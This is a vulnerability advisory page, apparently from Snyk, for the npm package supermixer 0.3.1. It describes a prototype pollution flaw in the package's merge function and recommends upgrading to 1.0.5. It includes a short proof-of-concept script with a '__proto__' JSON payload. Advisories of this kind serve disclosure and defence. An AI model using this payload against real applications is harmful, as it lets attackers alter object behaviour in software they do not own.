supermixer@0.3.1 vulnerabilities

Mix JS objects deep, shallow, traversing prototypes, selectively, etc.

Direct Vulnerabilities

Known vulnerabilities in the supermixer package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Prototype Pollution

supermixer is a Mix JS objects deep, shallow, traversing prototypes, selectively, etc.

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to modify the object prototype of an application using this package by leveraging the merge function. It allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.

PoC

var mixer = require('supermixer');
var payload = '{"__proto__":{"poc":"evil"}}';
var test = {};
console.log("Before: ", test.poc);
mixer.merge({},JSON.parse(payload));
console.log("After: ", test.poc);

How to fix Prototype Pollution?

Upgrade supermixer to version 1.0.5 or higher.

<1.0.5